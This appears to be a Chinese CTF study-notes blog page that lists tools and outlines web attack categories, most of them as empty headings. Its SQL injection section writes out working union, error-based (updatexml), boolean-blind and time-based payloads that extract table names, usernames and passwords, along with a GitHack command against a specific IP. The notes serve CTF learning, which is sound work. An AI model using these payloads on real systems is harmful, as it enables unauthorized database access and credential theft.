<li><strong>PWN（溢出）</strong>：PWN在黑客俚语中代表着攻破，取得权限，在CTF比赛中它代表着溢出类的题目，其中常见类型溢出漏洞有栈溢出、堆溢出。在CTF比赛中，线上比赛会有，但是比例不会太重，进入线下比赛，逆向和溢出则是战队实力的关键。主要考察参数选手漏洞挖掘和利用能力。<br> <strong>WEB（web类）</strong>：WEB应用在今天越来越广泛，也是CTF夺旗竞赛中的主要题型，题目涉及到常见的Web漏洞，诸如注入、XSS、文件包含、代码审计、上传等漏洞。这些题目都不是简单的注入、上传题目，至少会有一层的安全过滤，需要选手想办法绕过。且Web题目是国内比较多也是大家比较喜欢的题目。因为大多数人开始安全都是从web日站开始的。</li>
</ul>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h3 id="1-Linux-基本命令"><a href="#1-Linux-基本命令" class="headerlink" title="1.Linux 基本命令"></a>1.Linux 基本命令</h3><p><a href="Linux.md">Linux</a></p>
<h3 id="2-http、TCP-x2F-IP协议"><a href="#2-http、TCP-x2F-IP协议" class="headerlink" title="2.http、TCP&#x2F;IP协议"></a>2.http、TCP&#x2F;IP协议</h3><p><a href="%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE.md">网络协议</a></p>
<h3 id="3-SQL、PHP、JS"><a href="#3-SQL、PHP、JS" class="headerlink" title="3.SQL、PHP、JS"></a>3.SQL、PHP、JS</h3><p><a href="PHP%E7%AC%94%E8%AE%B0.md">PHP笔记</a></p>
<h2 id="工具学习"><a href="#工具学习" class="headerlink" title="工具学习"></a>工具学习</h2><h3 id="Burp-Suite"><a href="#Burp-Suite" class="headerlink" title="Burp Suite"></a>Burp Suite</h3><p>·主要功能:<br>1．拦截、查看或者修改网络请求和响应。<br>2.扫描web应用程序的安全漏洞。<br>3．自动化攻击web应用。<br>4．对数据编码和解码。</p>
<p>教程：<br>\<a target="_blank" rel="noopener" href="https://blog.csdn.net/Forget_liu/article/details/129824815">https://blog.csdn.net/Forget_liu/article/details/129824815</a></p>
<p>\<a target="_blank" rel="noopener" href="https://blog.csdn.net/YQavenger/article/details/108611357?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-1-108611357-blog-129824815.235%5Ev38%5Epc_relevant_sort_base2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-1-108611357-blog-129824815.235%5Ev38%5Epc_relevant_sort_base2&utm_relevant_index=2">https://blog.csdn.net/YQavenger/article/details/108611357?spm=1001.2101.3001.6650.1&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-1-108611357-blog-129824815.235%5Ev38%5Epc_relevant_sort_base2&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-1-108611357-blog-129824815.235%5Ev38%5Epc_relevant_sort_base2&amp;utm_relevant_index=2</a></p>
<p>\<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/547973012?utm_id=0">https://zhuanlan.zhihu.com/p/547973012?utm_id=0</a><br>应用场景：<br>\<a target="_blank" rel="noopener" href="https://blog.51cto.com/u_15127666/4516339">https://blog.51cto.com/u_15127666/4516339</a></p>
<h3 id="HackBar"><a href="#HackBar" class="headerlink" title="HackBar"></a>HackBar</h3><p>浏览器插件<br>帮助测试sql注入，xss漏洞利用</p>
<h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>sql自动注入工具</p>
<p>sqlmap教程：<br>\<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_33530840/article/details/82144515">https://blog.csdn.net/qq_33530840/article/details/82144515</a><br>\<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/164608.html">https://www.freebuf.com/sectool/164608.html</a></p>
<h3 id="webshell管理工具"><a href="#webshell管理工具" class="headerlink" title="webshell管理工具"></a>webshell管理工具</h3><p>蚁剑：网站管理工具<br>冰蝎：通信过程中使用AES加密<br>哥斯拉：替代工具<br>查看隐藏文件，网址</p>
<h3 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h3><p>git泄露，目录扫描<br>用于发现git泄露<br>教程：<br>\<a target="_blank" rel="noopener" href="https://www.cnblogs.com/linfangnan/p/13600490.html">https://www.cnblogs.com/linfangnan/p/13600490.html</a></p>
<p>命令：<br>\<a target="_blank" rel="noopener" href="http://www.onctf.com/posts/b4763959.html">http://www.onctf.com/posts/b4763959.html</a></p>
<p>dirsearch发现git泄露<br>githack获取源码<br>activate cc</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GitHack.py http://220.249.52.133:58698/.git/</span><br></pre></td></tr></table></figure>
<p>进行代码审计</p>
<h2 id="Misc（杂项）"><a href="#Misc（杂项）" class="headerlink" title="Misc（杂项）"></a>Misc（杂项）</h2><p>解码：<br>\<a target="_blank" rel="noopener" href="https://www.codeeeee.com/encrypt/rabbit.html">https://www.codeeeee.com/encrypt/rabbit.html</a><br>\<a target="_blank" rel="noopener" href="https://www.iamwawa.cn/">https://www.iamwawa.cn/</a></p>
<h3 id="正则表达式"><a href="#正则表达式" class="headerlink" title="正则表达式"></a>正则表达式</h3><p>匹配网站<br>\<a target="_blank" rel="noopener" href="https://regexr.com/">https://regexr.com/</a><br>菜鸟教程：<br>\<a target="_blank" rel="noopener" href="https://www.runoob.com/regexp/regexp-tutorial.html">https://www.runoob.com/regexp/regexp-tutorial.html</a></p>
<h3 id="文件操作与隐写"><a href="#文件操作与隐写" class="headerlink" title="文件操作与隐写"></a>文件操作与隐写</h3><h3 id="图片隐写术"><a href="#图片隐写术" class="headerlink" title="图片隐写术"></a>图片隐写术</h3><p>工具<br>\<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_62770485/article/details/124231894">https://blog.csdn.net/m0_62770485/article/details/124231894</a><br>思路<br>\<a target="_blank" rel="noopener" href="https://blog.51cto.com/u_14449312/3902300">https://blog.51cto.com/u_14449312/3902300</a><br>1.winhex看文本<br>2.stegdetect检测<br>\<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/1875">https://xz.aliyun.com/t/1875</a></p>
<h3 id="压缩文件处理"><a href="#压缩文件处理" class="headerlink" title="压缩文件处理"></a>压缩文件处理</h3><h3 id="流量取证技术"><a href="#流量取证技术" class="headerlink" title="流量取证技术"></a>流量取证技术</h3><h2 id="Crypto（密码学）"><a href="#Crypto（密码学）" class="headerlink" title="Crypto（密码学）"></a>Crypto（密码学）</h2><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><p>思路：<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_64815693/article/details/126834664">https://blog.csdn.net/m0_64815693/article/details/126834664</a><br>\<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_64815693/article/details/126834664">https://blog.csdn.net/m0_64815693/article/details/126834664</a></p>
<h3 id="一、SQL注入"><a href="#一、SQL注入" class="headerlink" title="一、SQL注入"></a>一、SQL注入</h3><p>sqlmap教程：<br>\<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/164608.html">https://www.freebuf.com/sectool/164608.html</a></p>
<p>sql注入教程：<br>\<a target="_blank" rel="noopener" href="https://www.cnblogs.com/snad/p/17247726.html">https://www.cnblogs.com/snad/p/17247726.html</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># table 1</span><br><span class="line">schemata --&gt; 存储该用户创建的所有数据库的库名</span><br><span class="line">schema_name --&gt; 记录数据库库名的字段</span><br><span class="line"></span><br><span class="line"># table 2</span><br><span class="line">tables --&gt; 存储该用户创建的所有数据库的库名和表名</span><br><span class="line">table_schema --&gt; 记录数据库库名的字段</span><br><span class="line">table_name --&gt; 记录数据库表名的字段</span><br><span class="line"></span><br><span class="line"># table 3</span><br><span class="line">columns --&gt; 存储该用户创建所有数据库的库名、表名和字段名</span><br><span class="line">table_schema --&gt; 记录数据库库名的字段</span><br><span class="line">table_name --&gt; 记录数据库表名的字段</span><br><span class="line">column_name --&gt; 记录表中的字段名的字段</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="1-联合查询注入"><a href="#1-联合查询注入" class="headerlink" title="1.联合查询注入"></a>1.联合查询注入</h4><p>CnHongke{8sblmmh65nu1sdki40od3iiud7}</p>
<p>爆库：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from `uu` WHERE flag=&#x27;a&#x27;  UNION select 1,2,group_concat(table_name) from information_schema.`TABLES` WHERE table_schema=database()</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; union select 1,group_concat(table_name) from information_schema.tables where table_schema = &#x27;dvwa&#x27; #</span><br></pre></td></tr></table></figure>
<p>爆表字段：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 1,group_concat(column_name)  from information_schema.columns where table_schema=database() and table_name=&#x27;user&#x27;</span><br></pre></td></tr></table></figure>
<p>构造payload获取值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select group_concat(id),group_concat(username) from user</span><br></pre></td></tr></table></figure>


<h4 id="2-报错注入"><a href="#2-报错注入" class="headerlink" title="2.报错注入"></a>2.报错注入</h4><p><strong>1.通过updatexml()函数进行报错注入</strong><br>函数解释：<br><strong>UPDATEXML (XML_document, XPath_string, new_value);</strong><br>第一个参数：XML_document是String格式，为XML文档对象的名称<br>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。<br>第三个参数：new_value，String格式，替换查找到的符合条件的数据<br>作用：此函数用来更新选定XML片段的内容，将XML标记的给定片段的单个部分替换为 xml_target 新的XML片段 new_xml ，然后返回更 改的XML。xml_target替换的部分 与xpath_expr 用户提供的XPath表达式匹配。如果未xpath_expr找到表达式匹配 ，或者找到多个匹配项，则该函数返回原始 xml_targetXML片段。</p>
<p>报错原理<br>这里和extractvalue函数一样，当Xpath路径语法错误时，就会报错，报错内容含有错误的路径内容。</p>
<p>约束条件<br>输出字符长度限制为32个字符</p>
<p><strong>?id&#x3D;1’ and updatexml(1, concat(0x7e, database(),0x7e),1) – a</strong></p>
<p><strong>?id&#x3D;1’ and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables</strong><br><strong>where table_schema &#x3D; database()), 0x7e), 1) – a</strong></p>
<p><strong>?id&#x3D;1’ and updatexml(1, concat(0x7e, (select group_concat(column_name) from</strong><br><strong>information_schema.columns where table_schema &#x3D; database() and table_name &#x3D; ‘users’), 0x7e),1) – a</strong></p>
<p><strong>?id&#x3D;1’ and updatexml(1, concat(0x7e, (select group_concat(username) from users), 0x7e),1) – a</strong><br><strong>?id&#x3D;1’ and updatexml(1, concat(0x7e, (select group_concat(password) from users), 0x7e),1) – a</strong></p>
<h4 id="3-Bool盲注"><a href="#3-Bool盲注" class="headerlink" title="3.Bool盲注"></a>3.Bool盲注</h4><p><strong>① 判断数据库的长度</strong><br><strong>?id&#x3D;1’ and length(database())&gt;7 – a</strong><br><strong>?id&#x3D;1’ and length(database())&gt;8 – a   回显不同，说明数据库的长度是8个字符</strong><br><strong>① 获取数据库名</strong><br><strong>?id&#x3D;1’ and ascii(substr(select database(),1,1))&#x3D;97 – a</strong></p>
<p><strong>② 判断库里表的个数</strong><br><strong>?id&#x3D;1’ and (select count(table_name) from information_schema.tables where table_schema &#x3D; database()) &gt; 3 – a</strong><br><strong>?id&#x3D;1’ and (select count(table_name) from information_schema.tables where table_schema &#x3D; database()) &gt; 4 – a</strong></p>
<p><strong>③ 获取库里各个表名的长度</strong><br><strong>?id&#x3D;1’ and length(select table_name from information_schema.tables where table_schema&#x3D;database() limit 0, 1)&gt;8 – a</strong><br><strong>③ 获取库里第一个表名中的第一个字符的ASCII值，可以此推断出表名，可借助bp爆破</strong><br><strong>?id&#x3D;1’ and ascii(substr((select table_name from information_schema.tables where table_schema &#x3D;</strong><br><strong>database() limit 0, 1),1,1))&#x3D;101 – a</strong></p>
<p><strong>④ 获取users表里的字段数</strong><br><strong>?id&#x3D;1’ and (select count(column_name) from information_schema.columns where table_schema &#x3D;</strong><br><strong>database() and table_name &#x3D; ‘users’) &#x3D; 3 – a</strong></p>
<p><strong>⑤ 获取各字段(列名)长度</strong><br><strong>?id&#x3D;1’ and length(select column_name from information_schema.columns where table_schema&#x3D;database() and table_name &#x3D; ‘users’ limit 0, 1)&gt;8 – a</strong><br><strong>⑤ 获取字段名称</strong><br><strong>?id&#x3D;1’ and ascii(substr((select column_name from information_schema.columns where table_schema&#x3D;</strong><br><strong>database() and table_name &#x3D; ‘users’ limit 0, 1), 1, 1) )&#x3D;97 – a</strong></p>
<p><strong>⑥ 获取字段值</strong><br><strong>?id&#x3D;1’ and ascii(substr((select username from users limit 0, 1), 1, 1)) &#x3D; 97 – a</strong><br><strong>?id&#x3D;1’ and ascii(substr((select group_concat(username) from users), 1, 1)) &#x3D; 97 – a</strong></p>
<h4 id="4-宽字节（时间）注入"><a href="#4-宽字节（时间）注入" class="headerlink" title="4.宽字节（时间）注入"></a>4.宽字节（时间）注入</h4><p><strong>?id&#x3D;1’ and if(length(database()) &#x3D; 8, sleep(5), 1) – a</strong> 睡了5秒<br>因为没有回显，可在布尔盲注上加上if(布尔盲注语句,sleep(5),1)，通过时间判断对错</p>
<p>主要通过if() 和substr() 和sleep()</p>
<h4 id="5-二次注入"><a href="#5-二次注入" class="headerlink" title="5.二次注入"></a>5.二次注入</h4><p>第一次过滤了’等特殊字符  但后面更新是没有过滤’等特殊字符 导致更新是二次注入</p>
<h3 id="二、xss（跨站脚本攻击）"><a href="#二、xss（跨站脚本攻击）" class="headerlink" title="二、xss（跨站脚本攻击）"></a>二、xss（跨站脚本攻击）</h3><p>\<a target="_blank" rel="noopener" href="https://www.cnblogs.com/snad/p/17247840.html">https://www.cnblogs.com/snad/p/17247840.html</a></p>
<h4 id="1-XSS漏洞类型和利用方法"><a href="#1-XSS漏洞类型和利用方法" class="headerlink" title="1.XSS漏洞类型和利用方法"></a>1.XSS漏洞类型和利用方法</h4><h4 id="2-绕过“内容安全策略”"><a href="#2-绕过“内容安全策略”" class="headerlink" title="2.绕过“内容安全策略”"></a>2.绕过“内容安全策略”</h4><h3 id="三、PHP特性攻击"><a href="#三、PHP特性攻击" class="headerlink" title="三、PHP特性攻击"></a>三、PHP特性攻击</h3><h4 id="1-x3D-与-x3D-区别"><a href="#1-x3D-与-x3D-区别" class="headerlink" title="1.=&#x3D;与==&#x3D;区别"></a>1.=&#x3D;与==&#x3D;区别</h4><p>==&#x3D;在进行比较的时候，会先判断两种字符串的类型是否相等，再比较<br>=&#x3D;在进行比较的时候，会先将字符串类型转化成相同，再比较</p>
<p>1=&#x3D;=true:false<br>1=&#x3D;ture:true</p>
<p>如果比较一个数字和字符串或者比较涉及到数字内容的字符串，则字符串会被转换成数值并且比较按照数值来进行<br><strong>字符串与数字转换规则</strong>：<br>从遇见的第一位不是数字开始丢弃<br>123admin-&gt;123<br>123a12321-&gt;123</p>
<h4 id="2-MD5验证绕过方法"><a href="#2-MD5验证绕过方法" class="headerlink" title="2.MD5验证绕过方法"></a>2.MD5验证绕过方法</h4><p>\<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_64815693/article/details/126834664">https://blog.csdn.net/m0_64815693/article/details/126834664</a></p>
<h3 id="四、文件上传"><a href="#四、文件上传" class="headerlink" title="四、文件上传"></a>四、文件上传</h3><h4 id="1-客户端检测绕过方式"><a href="#1-客户端检测绕过方式" class="headerlink" title="1.客户端检测绕过方式"></a>1.客户端检测绕过方式</h4><h4 id="2-MIME类型检测绕过方式"><a href="#2-MIME类型检测绕过方式" class="headerlink" title="2.MIME类型检测绕过方式"></a>2.MIME类型检测绕过方式</h4><h4 id="3-文件后缀检测绕过方式"><a href="#3-文件后缀检测绕过方式" class="headerlink" title="3.文件后缀检测绕过方式"></a>3.文件后缀检测绕过方式</h4><h4 id="4-文件内容检测绕过方式"><a href="#4-文件内容检测绕过方式" class="headerlink" title="4.文件内容检测绕过方式"></a>4.文件内容检测绕过方式</h4><h3 id="五、文件包含"><a href="#五、文件包含" class="headerlink" title="五、文件包含"></a>五、文件包含</h3><h4 id="1-文件包含的函数"><a href="#1-文件包含的函数" class="headerlink" title="1.文件包含的函数"></a>1.文件包含的函数</h4><h4 id="2-读取敏感文件6547"><a href="#2-读取敏感文件6547" class="headerlink" title="2.读取敏感文件6547"></a>2.读取敏感文件6547</h4><h4 id="3-获取服务器权限"><a href="#3-获取服务器权限" class="headerlink" title="3.获取服务器权限"></a>3.获取服务器权限</h4><h3 id="六、远程命令执行"><a href="#六、远程命令执行" class="headerlink" title="六、远程命令执行"></a>六、远程命令执行</h3><h4 id="1-PHP等语言常见的系统命令执行函数"><a href="#1-PHP等语言常见的系统命令执行函数" class="headerlink" title="1.PHP等语言常见的系统命令执行函数"></a>1.PHP等语言常见的系统命令执行函数</h4><p>利用了执行命令函数的参数漏洞<br>mkdir </p>
<h4 id="2-命令拼接方法"><a href="#2-命令拼接方法" class="headerlink" title="2.命令拼接方法"></a>2.命令拼接方法</h4><h4 id="3-绕过过滤机制"><a href="#3-绕过过滤机制" class="headerlink" title="3.绕过过滤机制"></a>3.绕过过滤机制</h4><h3 id="七、服务端请求伪造"><a href="#七、服务端请求伪造" class="headerlink" title="七、服务端请求伪造"></a>七、服务端请求伪造</h3><h4 id="1-SSRF的利用技巧"><a href="#1-SSRF的利用技巧" class="headerlink" title="1.SSRF的利用技巧"></a>1.SSRF的利用技巧</h4><h4 id="2-SSRF攻击mysql"><a href="#2-SSRF攻击mysql" class="headerlink" title="2.SSRF攻击mysql"></a>2.SSRF攻击mysql</h4><h4 id="3-SSRF攻击redis"><a href="#3-SSRF攻击redis" class="headerlink" title="3.SSRF攻击redis"></a>3.SSRF攻击redis</h4><h3 id="八、XML外部实体注入"><a href="#八、XML外部实体注入" class="headerlink" title="八、XML外部实体注入"></a>八、XML外部实体注入</h3><p>\<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wwcdg/p/15913894.html">https://www.cnblogs.com/wwcdg/p/15913894.html</a></p>
<h4 id="1-XML基础知识"><a href="#1-XML基础知识" class="headerlink" title="1.XML基础知识"></a>1.XML基础知识</h4><h4 id="2-绕过过滤机制，实现漏洞利用"><a href="#2-绕过过滤机制，实现漏洞利用" class="headerlink" title="2.绕过过滤机制，实现漏洞利用"></a>2.绕过过滤机制，实现漏洞利用</h4><h3 id="九、NodeJS"><a href="#九、NodeJS" class="headerlink" title="九、NodeJS"></a>九、NodeJS</h3><h4 id="1-javaScrip基本语法"><a href="#1-javaScrip基本语法" class="headerlink" title="1.javaScrip基本语法"></a>1.javaScrip基本语法</h4><h4 id="2-类型污染"><a href="#2-类型污染" class="headerlink" title="2.类型污染"></a>2.类型污染</h4><h4 id="3-原型链污染"><a href="#3-原型链污染" class="headerlink" title="3.原型链污染"></a>3.原型链污染</h4><h3 id="十、反序列化"><a href="#十、反序列化" class="headerlink" title="十、反序列化"></a>十、反序列化</h3><h4 id="1-PHP反序列化漏洞原理"><a href="#1-PHP反序列化漏洞原理" class="headerlink" title="1.PHP反序列化漏洞原理"></a>1.PHP反序列化漏洞原理</h4><h4 id="2-构造POP链"><a href="#2-构造POP链" class="headerlink" title="2.构造POP链"></a>2.构造POP链</h4><h2 id="Reverse（逆向工程）"><a href="#Reverse（逆向工程）" class="headerlink" title="Reverse（逆向工程）"></a>Reverse（逆向工程）</h2><h2 id="PNW（漏洞挖掘与漏洞利用）二进制难"><a href="#PNW（漏洞挖掘与漏洞利用）二进制难" class="headerlink" title="PNW（漏洞挖掘与漏洞利用）二进制难"></a>PNW（漏洞挖掘与漏洞利用）二进制难</h2>
      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://example.com/2023/08/1b0a1e9c8caf.html" title="" target="_blank" rel="external">http://example.com/2023/08/1b0a1e9c8caf.html</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/limingqian17" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/limingqian17" target="_blank"><span class="text-dark">安xy</span><small class="ml-1x">安_blog</small></a></h3>
        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2023/08/32e240f3738f.html" title="(no title)"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2023/07/1a64d2540900.html" title="(no title)"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  
  <div class="bar-right">
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/limingqian17" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="http://weibo.com/cofess" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/iwebued" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/cofess" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   






</body>
</html>